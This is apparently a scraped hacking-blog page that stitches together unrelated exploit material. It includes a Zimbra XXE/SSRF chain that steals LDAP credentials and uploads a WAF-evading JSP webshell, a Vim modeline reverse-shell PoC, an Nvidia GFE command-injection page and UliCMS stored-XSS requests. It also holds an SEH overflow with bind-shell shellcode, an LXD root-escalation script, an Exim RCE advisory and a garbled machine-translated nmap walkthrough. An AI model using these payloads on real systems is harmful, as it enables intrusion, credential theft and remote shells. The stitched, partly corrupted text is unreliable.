#coding=utf8
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
base_url=sys.argv[1]
base_url=base_url.rstrip("/")
#upload file name and content
#modify by k8gege
#Connect "shell.jsp" using K8fly CmdShell
#Because the CMD parameter is encrypted using Base64(bypass WAF)
filename = "shell.jsp"
fileContent = r'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>'
print(base_url)
#dtd file url
dtd_url="https://k8gege.github.io/zimbra.dtd"
"""
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
"""
xxe_data = r"""<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "{dtd}">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>""".format(dtd=dtd_url)
#XXE stage
headers = {
"Content-Type":"application/xml"
}
print("[*] Get User Name/Password By XXE ")
r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15)
#print r.text
if 'response schema not available' not in r.text:
print("have no xxe")
exit()
#low_token Stage
import re
pattern_name = re.compile(r"<key name=(\"|")zimbra_user(\"|")>\n.*?<value>(.*?)<\/value>")
pattern_password = re.compile(r"<key name=(\"|")zimbra_ldap_password(\"|")>\n.*?<value>(.*?)<\/value>")
username = pattern_name.findall(r.text)[0][2]
password = pattern_password.findall(r.text)[0][2]
print(username)
print(password)
auth_body="""<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="{xmlns}">
<account by="adminName">{username}</account>
<password>{password}</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
"""
print("[*] Get Low Privilege Auth Token")
r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False)
pattern_auth_token=re.compile(r"<authToken>(.*?)</authToken>")
low_priv_token = pattern_auth_token.findall(r.text)[0]
#print(low_priv_token)
# SSRF+Get Admin_Token Stage
headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";"
headers["Host"]="foo:7071"
print("[*] Get Admin Auth Token By SSRF")
r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password),headers=headers,verify=False)
admin_token =pattern_auth_token.findall(r.text)[0]
#print("ADMIN_TOKEN:"+admin_token)
f = {
'filename1':(None,"whocare",None),
'clientFile':(filename,fileContent,"text/plain"),
'requestId':(None,"12",None),
}
headers ={
"Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";"
}
print("[*] Uploading file")
r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False)
#print(r.text)
print("Shell: "+base_url+"/downloads/"+filename)
#print("Connect \"shell.jsp\" using K8fly CmdShell\nBecause the CMD parameter is encrypted using Base64(bypass WAF)")
print("[*] Request Result:")
s = requests.session()
r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers)
#print(r.text)
print("May need cookie:")
print(headers['Cookie'])
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863592081
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
*by Arminius ([@rawsec](https://twitter.com/rawsec))*
Vim/Neovim Arbitrary Code Execution via Modelines
=================================================
```
Product: Vim < 8.1.1365, Neovim < 0.3.6
Type: Arbitrary Code Execution
CVE: CVE-2019-12735
Date: 2019-06-04
Author: Arminius (@rawsec)
```
Summary
-------
Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code
execution via modelines by opening a specially crafted text file.
Proof of concept
----------------
- Create [`poc.txt`](../data/2019-06-04_ace-vim-neovim/poc.txt):
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
- Ensure that the modeline option has not been disabled (`:set modeline`).
- Open the file in Vim:
$ vim poc.txt
- The system will execute `uname -a`.
Proof of concept 2 (reverse shell)
----------------------------------
This PoC outlines a real-life attack approach in which a reverse shell
is launched once the user opens the file. To conceal the attack, the file will
be immediately rewritten when opened. Also, the PoC uses terminal escape
sequences to hide the modeline when the content is printed with `cat`. (`cat
-v` reveals the actual content.)
[`shell.txt`](../data/2019-06-04_ace-vim-neovim/shell.txt):
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n
Demo (victim left, attacker right):
Details
-------
The modeline feature allows to specify custom editor options near the start or
end of a file. This feature is enabled by default and applied to all file types,
including plain `.txt`. A typical modeline:
/* vim: set textwidth=80 tabstop=8: */
For security reasons, only a subset of options is permitted in modelines, and
if the option value contains an expression, it is executed in a sandbox: [[1]]
No other commands than "set" are supported, for security reasons (somebody
might create a Trojan horse text file with modelines). And not all options
can be set. For some options a flag is set, so that when it's used the
|sandbox| is effective.
The sandbox is meant to prevent side effects: [[2]]
The 'foldexpr', 'formatexpr', 'includeexpr', 'indentexpr', 'statusline' and
'foldtext' options may be evaluated in a sandbox. This means that you are
protected from these expressions having nasty side effects. This gives some
safety for when these options are set from a modeline.
However, the `:source!` command (with the bang [`!`] modifier) can be used to
bypass the sandbox. It reads and executes commands from a given file as if
*typed manually*, running them after the sandbox has been left. [[3]]
:so[urce]! {file} Read Vim commands from {file}. These are commands
that are executed from Normal mode, like you type
them.
Thus, one can trivially construct a modeline that runs code outside the sandbox:
# vim: set foldexpr=execute('\:source! some_file'):
An additional step is needed for Neovim which blacklists `execute()`: [[4]]
execute({command} [, {silent}]) *execute()*
Execute {command} and capture its output.
[...]
This function is not available in the |sandbox|.
Here, `assert_fails()` can be used instead, which takes a `{cmd}` argument, too: [[5]]
assert_fails({cmd} [, {error} [, {msg}]]) *assert_fails()*
Run {cmd} and add an error message to |v:errors| if it does
NOT produce an error.
The following modeline utilizes a fold expression to run `source! %` to
execute the current file, which in turn executes `uname -a || "(garbage)"` as a
shell command:
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
Additionally, the Neovim-only function `nvim_input()` is vulnerable to the same
approach via e.g.:
vi:fen:fdm=expr:fde=nvim_input("\:terminal\ uname\ -a"):fdl=0
(In the past, other modeline-related vulnerabilities have been patched in Vim - see [CVE-2002-1377](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1377), [CVE-2016-1248](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248).)
Patches
-------
- [Vim patch 8.1.1365](https://github.com/vim/vim/commit/5357552)
- [Neovim patch](https://github.com/neovim/neovim/pull/10082) (released in [v0.3.6](https://github.com/neovim/neovim/releases/tag/v0.3.6))
Beyond patching, it's recommended to disable modelines in the vimrc (`set
nomodeline`), to use the [securemodelines](https://github.com/ciaranm/securemodelines/)
plugin, or to disable `modelineexpr` (since patch 8.1.1366, Vim-only) to disallow
expressions in modelines.
Timeline
--------
- 2019-05-22 Vim and Neovim maintainers notified
- 2019-05-23 Vim patch released
- 2019-05-29 Neovim patch released
- 2019-06-05 CVE ID CVE-2019-12735 assigned
Also see description of [CVE-2019-12735](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12735).
[1]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/options.txt#L582
[2]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/eval.txt#L13050
[3]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/repeat.txt#L182
[4]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L3247
[5]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L2494
[6]: https://github.com/vim/vim/releases/tag/v8.1.1365
[7]: https://github.com/neovim/neovim/releases/tag/v0.3.6
<!--
POC for CVE‑2019‑5678 Nvidia GeForce Experience OS command injection via a web browser
Author: David Yesland -- Rhino Security Labs
-->
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</head>
<body>
<script>
//Send request to local GFE server
function submitRequest(port,secret)
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1:"+port+"\/gfeupdate\/autoGFEInstall\/", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "text\/html");
xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret);
var body = "\""+document.getElementById("cmd").value+"\"";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
$(document).on('change', '.file-upload-button', function(event) {
var reader = new FileReader();
reader.onload = function(event) {
var jsonObj = JSON.parse(event.target.result);
submitRequest(jsonObj.port,jsonObj.secret);
}
reader.readAsText(event.target.files[0]);
});
//Copy text from some text field
function myFunction() {
var copyText = document.getElementById("myInput");
copyText.select();
document.execCommand("copy");
}
//trigger the copy and file window on ctrl press
$(document).keydown(function(keyPressed) {
if (keyPressed.keyCode == 17) {
myFunction();document.getElementById('file-input').click();
}
});
</script>
<h2>
Press CTRL+V+Enter
</h2>
<!--Command to run in a hidden input field-->
<input type="hidden" value="calc.exe" id="cmd" size="55">
<!--Hidden text box to copy text from-->
<div style="opacity: 0.0;">
<input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json"
id="myInput" size="1">
</div>
<!--file input-->
<input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" class='file-upload-button' type="file" name="name" style="display: none;" />
</body>
</html>
# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Date: 2019-05-12
# Exploit Author: Unk9vvN
# Vendor Homepage: https://en.ulicms.de
# Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig
# Version: 2019.1
# Tested on: Kali Linux
# CVE : CVE-2019-11398
# Description
# This vulnerability is in the authentication state and is located in the CMS management panel, and the type of vulnerability is Stored and the vulnerability parameters are as follows.
# Vuln One
# URI: POST /ulicms/admin/index.php?action=languages
# Parameter: name="><script>alert('UNK9VVN')</script>
# Vuln Two
# URI: POST /ulicms/admin/index.php?action=pages_edit&page=23
# Parameter: systemname="><script>alert('UNK9VVN')</script>
#
# PoC POST (Cross Site Scripting Stored)
#
POST /ulicms/admin/index.php HTTP/1.1
Host: XXXXXXXX.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E
#
# PoC POST (Cross Site Scripting Stored)
#
POST /ulicms/admin/index.php HTTP/1.1
Host: XXXXXXXX.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 904
Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
Connection: close
DNT: 1
csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content=
# Discovered by:
t.me/Unk9vvN
CVE-2019-0841 BYPASS #2
There is a second bypass for CVE-2019-0841.
This can be triggered as following:
Delete all files and subfolders within "c:\users\%username%\appdata\local\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\" (atleast the ones we can delete as user)
Try to launch edge. It will crash the first time.
When we launch it a second time, it will write the DACL while impersonating "SYSTEM".
The trick here is to launch edge by clicking it on the taskbar or desktop, using "start microsoft-edge:" seems to result in correct impersonation.
You can still do this completely programmatically.. since edge will always be in the same position in the task bar.. *cough* sendinput *cough*. There is probably other ways too.
Another note, this bug is most definitely not restricted to edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and close it as soon as the bug completes. I think it will also trigger by just launching edge once, but sometimes you may have to wait a little. I didn't do extensive testing.. found this bug and quickly wrote up a poc, took me like 2 hours total, finding LPEs is easy.
To repro:
1. Launch my poc
2. Launch edge several times
Use video demo as guidance. Also, I don't get paid for dropping bugs, so if you want a simple and full exploit, then go fucking write it yourself, I have better things to do, such as preparing my voyage into the arctic. You're welcome.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Make sure you have multiple cores in your VM (not multiple processors, multiple cores).
It's going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes it means you either have 1 core or set your vm to have multiple processors instead of multiple cores... which will also cause it to lock up.
EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46976.zip
Qualys Security Advisory
The Return of the WIZard: RCE in Exim (CVE-2019-10149)
========================================================================
Contents
========================================================================
Summary
Local exploitation
Remote exploitation
- Non-default configurations
- Default configuration
Acknowledgments
Timeline
Boromir: "What is this new devilry?"
Gandalf: "A Balrog. A demon of the Ancient World."
-- The Lord of the Rings: The Fellowship of the Ring
========================================================================
Summary
========================================================================
During a code review of the latest changes in the Exim mail server
(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability
in versions 4.87 to 4.91 (inclusive). In this particular case, RCE means
Remote *Command* Execution, not Remote Code Execution: an attacker can
execute arbitrary commands with execv(), as root; no memory corruption
or ROP (Return-Oriented Programming) is involved.
This vulnerability is exploitable instantly by a local attacker (and by
a remote attacker in certain non-default configurations). To remotely
exploit this vulnerability in the default configuration, an attacker
must keep a connection to the vulnerable server open for 7 days (by
transmitting one byte every few minutes). However, because of the
extreme complexity of Exim's code, we cannot guarantee that this
exploitation method is unique; faster methods may exist.
Exim is vulnerable by default since version 4.87 (released on April 6,
2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and
older versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled
manually. Surprisingly, this vulnerability was fixed in version 4.92
(released on February 10, 2019):
https://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...
https://bugs.exim.org/show_bug.cgi?id=2310
but was not identified as a security vulnerability, and most operating
systems are therefore affected. For example, we exploit an up-to-date
Debian distribution (9.9) in this advisory.
========================================================================
Local exploitation
========================================================================
The vulnerable code is located in deliver_message():
6122 #ifndef DISABLE_EVENT
6123 if (process_recipients != RECIP_ACCEPT)
6124 {
6125 uschar * save_local = deliver_localpart;
6126 const uschar * save_domain = deliver_domain;
6127
6128 deliver_localpart = expand_string(
6129 string_sprintf("${local_part:%s}", new->address));
6130 deliver_domain = expand_string(
6131 string_sprintf("${domain:%s}", new->address));
6132
6133 (void) event_raise(event_action,
6134 US"msg:fail:internal", new->message);
6135
6136 deliver_localpart = save_local;
6137 deliver_domain = save_domain;
6138 }
6139 #endif
Because expand_string() recognizes the "${run{<command> <args>}}"
expansion item, and because new->address is the recipient of the mail
that is being delivered, a local attacker can simply send a mail to
"${run{...}}@localhost" (where "localhost" is one of Exim's
local_domains) and execute arbitrary commands, as root
(deliver_drop_privilege is false, by default):
[...]
========================================================================
Remote exploitation
========================================================================
Our local-exploitation method does not work remotely, because the
"verify = recipient" ACL (Access-Control List) in Exim's default
configuration requires the local part of the recipient's address (the
part that precedes the @ sign) to be the name of a local user:
[...]
------------------------------------------------------------------------
Non-default configurations
------------------------------------------------------------------------
We eventually devised an elaborate method for exploiting Exim remotely
in its default configuration, but we first identified various
non-default configurations that are easy to exploit remotely:
- If the "verify = recipient" ACL was removed manually by an
administrator (maybe to prevent username enumeration via RCPT TO),
then our local-exploitation method also works remotely.
- If Exim was configured to recognize tags in the local part of the
recipient's address (via "local_part_suffix = +* : -*" for example),
then a remote attacker can simply reuse our local-exploitation method
with an RCPT TO "balrog+${run{...}}@localhost" (where "balrog" is the
name of a local user).
- If Exim was configured to relay mail to a remote domain, as a
secondary MX (Mail eXchange), then a remote attacker can simply reuse
our local-exploitation method with an RCPT TO "${run{...}}@khazad.dum"
(where "khazad.dum" is one of Exim's relay_to_domains). Indeed, the
"verify = recipient" ACL can only check the domain part of a remote
address (the part that follows the @ sign), not the local part.
------------------------------------------------------------------------
Default configuration
------------------------------------------------------------------------
[...]
========================================================================
Acknowledgments
========================================================================
We thank Exim's developers, Solar Designer, and the members of
distros@openwall.
"The Return of the WIZard" is a reference to Sendmail's ancient WIZ and
DEBUG vulnerabilities:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145
https://seclists.org/bugtraq/1995/Feb/56
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095
http://www.cheswick.com/ches/papers/berferd.pdf
========================================================================
Timeline
========================================================================
2019-05-27: Advisory sent to security@exim.
2019-05-28: Advisory sent to distros@openwall.
#!/usr/bin/python
# _*_ coding:utf-8 _*_
# Exploit Title: ProShow v9.0.3797 Local Exploit
# Exploit Author: @Yonatan_Correa
# website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
# Vendor Homepage: http://www.photodex.com/ProShow
# Software Link: http://files.photodex.com/release/pspro_90_3797.exe
# Version: v9.0.3797
# Tested on: Wind 7
from struct import pack
informacion = """
ProShow v9.0.3797
http://www.photodex.com/ProShow
execute exploit
create a file called "load"
copy load "C:\Program Files\Photodex\ProShow Producer\"
"C:\Program Files\Photodex\ProShow Producer\proshow.exe"
And connect nc -nv IP_Host 4444
Testing: Windows 7
@Yonatan_Correa
https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
"""
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c
# Payload size: 717 bytes
shell = "yonayona" + ("\x89\xe5\xda\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
"\x4c\x59\x78\x4f\x72\x57\x70\x65\x50\x45\x50\x53\x50\x6d\x59"
"\x39\x75\x75\x61\x4f\x30\x45\x34\x6c\x4b\x30\x50\x66\x50\x6e"
"\x6b\x30\x52\x74\x4c\x6e\x6b\x36\x32\x77\x64\x6c\x4b\x72\x52"
"\x36\x48\x66\x6f\x4c\x77\x42\x6a\x46\x46\x75\x61\x79\x6f\x4e"
"\x4c\x55\x6c\x50\x61\x51\x6c\x55\x52\x64\x6c\x77\x50\x79\x51"
"\x38\x4f\x36\x6d\x53\x31\x79\x57\x4a\x42\x49\x62\x42\x72\x42"
"\x77\x4e\x6b\x32\x72\x64\x50\x4e\x6b\x71\x5a\x55\x6c\x4c\x4b"
"\x32\x6c\x37\x61\x31\x68\x79\x73\x43\x78\x67\x71\x58\x51\x52"
"\x71\x4c\x4b\x51\x49\x65\x70\x43\x31\x68\x53\x4c\x4b\x70\x49"
"\x42\x38\x4a\x43\x47\x4a\x71\x59\x6c\x4b\x76\x54\x6e\x6b\x53"
"\x31\x4e\x36\x64\x71\x79\x6f\x4c\x6c\x69\x51\x38\x4f\x66\x6d"
"\x67\x71\x48\x47\x56\x58\x6d\x30\x64\x35\x38\x76\x65\x53\x53"
"\x4d\x59\x68\x35\x6b\x73\x4d\x65\x74\x54\x35\x58\x64\x72\x78"
"\x4c\x4b\x52\x78\x46\x44\x76\x61\x58\x53\x35\x36\x4c\x4b\x56"
"\x6c\x50\x4b\x4e\x6b\x30\x58\x57\x6c\x57\x71\x49\x43\x4e\x6b"
"\x75\x54\x4e\x6b\x56\x61\x48\x50\x4f\x79\x42\x64\x75\x74\x64"
"\x64\x61\x4b\x43\x6b\x33\x51\x43\x69\x50\x5a\x73\x61\x69\x6f"
"\x6b\x50\x63\x6f\x53\x6f\x32\x7a\x6c\x4b\x47\x62\x5a\x4b\x4c"
"\x4d\x71\x4d\x43\x58\x70\x33\x77\x42\x35\x50\x53\x30\x35\x38"
"\x63\x47\x43\x43\x34\x72\x61\x4f\x46\x34\x71\x78\x62\x6c\x51"
"\x67\x67\x56\x73\x37\x39\x6f\x58\x55\x68\x38\x4a\x30\x67\x71"
"\x33\x30\x35\x50\x76\x49\x78\x44\x46\x34\x36\x30\x62\x48\x46"
"\x49\x6b\x30\x50\x6b\x65\x50\x79\x6f\x48\x55\x43\x5a\x37\x78"
"\x50\x59\x62\x70\x5a\x42\x4b\x4d\x51\x50\x70\x50\x73\x70\x30"
"\x50\x61\x78\x4b\x5a\x44\x4f\x39\x4f\x39\x70\x69\x6f\x68\x55"
"\x4d\x47\x70\x68\x77\x72\x43\x30\x47\x61\x73\x6c\x4f\x79\x4d"
"\x36\x52\x4a\x66\x70\x31\x46\x61\x47\x35\x38\x69\x52\x39\x4b"
"\x44\x77\x73\x57\x69\x6f\x6b\x65\x76\x37\x71\x78\x78\x37\x4a"
"\x49\x64\x78\x39\x6f\x79\x6f\x79\x45\x62\x77\x62\x48\x54\x34"
"\x78\x6c\x57\x4b\x79\x71\x79\x6f\x5a\x75\x63\x67\x4e\x77\x33"
"\x58\x30\x75\x32\x4e\x70\x4d\x33\x51\x59\x6f\x6a\x75\x65\x38"
"\x53\x53\x50\x6d\x71\x74\x47\x70\x4b\x39\x6a\x43\x61\x47\x76"
"\x37\x36\x37\x76\x51\x6b\x46\x72\x4a\x37\x62\x52\x79\x63\x66"
"\x7a\x42\x6b\x4d\x61\x76\x6f\x37\x32\x64\x55\x74\x45\x6c\x76"
"\x61\x75\x51\x4e\x6d\x43\x74\x77\x54\x34\x50\x49\x56\x47\x70"
"\x51\x54\x32\x74\x56\x30\x62\x76\x73\x66\x52\x76\x43\x76\x56"
"\x36\x62\x6e\x50\x56\x71\x46\x53\x63\x51\x46\x61\x78\x52\x59"
"\x5a\x6c\x67\x4f\x4d\x56\x59\x6f\x6e\x35\x6c\x49\x6d\x30\x70"
"\x4e\x71\x46\x61\x56\x79\x6f\x44\x70\x45\x38\x56\x68\x4c\x47"
"\x45\x4d\x75\x30\x6b\x4f\x79\x45\x4d\x6b\x4b\x4e\x76\x6e\x54"
"\x72\x48\x6a\x35\x38\x59\x36\x5a\x35\x6d\x6d\x6d\x4d\x49\x6f"
"\x6e\x35\x55\x6c\x36\x66\x43\x4c\x44\x4a\x4d\x50\x59\x6b\x6b"
"\x50\x72\x55\x75\x55\x6f\x4b\x32\x67\x74\x53\x74\x32\x70\x6f"
"\x72\x4a\x73\x30\x52\x73\x39\x6f\x59\x45\x41\x41")
junk = shell + ("\x41" * 9479) # 10204
nseh = "\xEB\x06\x90\x90"
seh = pack('<I',0x10045f50) # pop pop ret
nop = "\x90" * 86
nop2 = "\x90" * 10
egg = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x79\x6f\x6e\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
todo = junk + nseh + seh + nop + egg + nop2
arch = open("load", "wb")
arch.write(todo)
arch.close()
print informacion
print "\nCreated File size " + str(len(todo))
#!/usr/bin/env bash
# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
# Victor Lasa (vowkin)
# ----------------------------------
# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine
function helpPanel(){
echo -e "\nUsage:"
echo -e "\t[-f] Filename (.tar.gz alpine file)"
echo -e "\t[-h] Show this help panel\n"
exit 1
}
function createContainer(){
lxc image import $filename --alias alpine && lxd init --auto
echo -e "[*] Listing images...\n" && lxc image list
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc sh
cleanup
}
function cleanup(){
echo -en "\n[*] Removing container..."
lxc stop privesc && lxc delete privesc && lxc image delete alpine
echo " [√]"
}
set -o nounset
set -o errexit
declare -i parameter_enable=0; while getopts ":f:h:" arg; do
case $arg in
f) filename=$OPTARG && let parameter_enable+=1;;
h) helpPanel;;
esac
done
if [ $parameter_enable -ne 1 ]; then
helpPanel
else
createContainer
fi
1。情報収集
1.生き残った宿主をスカン
ARP-SCAN-L
192.168.1.13がターゲットマシンのIPアドレスであることがわかりました。
2.ポートスキャン
次に、NMAPアーティファクトを使用してターゲットIPアドレスをスキャンします。コマンドは次のとおりです。
root@kali2018:〜#nmap -a192.168.1.13
2019-02-13 01:18 ESTでNMAP 7.70(https://nmap.org)を開始
192.168.1.13のNMAPスキャンレポート
ホストはアップ(0.0014Sレイテンシ)です。
表示されていません: 996閉じたポート
ポートステートサービスバージョン
22/tcpopensshopenssh 7.2p2 ubuntu 4ubuntu2.4(ubuntu linux; Protocol 2.0)
| ssh-hostkey:
|2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
| 256 53:9D:2:67:34:CF:0A:D5:5A:9A:113:74:BD33333333333333333333:DSE3333333333:DS)
|_256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b13:d7:1b:66:83 (ED25519)
80/tcpopenhttpapache httpd 2.4.18((ubuntu))
| http-robots.txt: 1無効エントリ
| _/
| _http-server-header: apache/2.4.18(ubuntu)
| _HTTP -TITLE: FOWSNIFF CORP-ソリューションの配信
110/TCP OpenPop3Dovecot POP3D
| _pop3-capability: auth-resp-code uidl sasl(plain)パイプラインユーザーCAPAトップリスコード
143/tcp openimapdovecot imapd
| _imap-capabilities:はOKを持っています。
MACアドレス: 08:00336027:1E336080:B0(Oracle VirtualBox Virtual Nic)
デバイスタイプ:汎用
running: linux 3.x | 4.x
OS CPE: CPE:/O:LINUX:LINUX_KERNEL3:3 CPE:/O:LINUX33:LINUX_KERNEL:4
OS詳細: Linux 3.2-4.9
ネットワーク距離: 1ホップ
サービス情報: OS: Linux; CPE: CPE:/O:LINUX:LINUX_KERNEL
Traceroute
ホップrttaddress
11.38 MS 192.168.1.13
OSとサービスの検出が実行されました。誤った結果はhttps://nmap.org/submit/で報告してください。
NMAP DONE: 1 IPアドレス(1ホストアップ)9.44秒でスキャン
